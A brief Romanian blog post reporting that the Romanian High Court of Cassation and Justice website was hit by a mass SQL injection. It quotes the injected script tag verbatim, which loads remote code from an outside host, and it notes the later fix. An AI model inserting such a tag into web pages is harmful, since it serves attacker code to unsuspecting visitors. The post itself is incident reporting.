www.scj.ro a primit o injecție cu SQL
Încercam să aflu ceva de pe saitul Înaltei Curți de Casație și Justiție (denumit, foarte românește, folosind inițialele de la Supreme Court of Justice… până la urmă We’re all living in America, nu?).
Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script>. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…
Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?
La mulți ani!
Completare (4 ianuarie 2012): S-a reparat.
Citește și:
ECRIS – este bun, dar poate fi și mai bun
Filed under: Calculatoare, Diverse | Leave a Comment
Etichete:Î.C.C.J., ECRIS, incompetenţă, land of confusion, lilupophilupop, SQL injection




No Responses Yet to “www.scj.ro a primit o injecție cu SQL”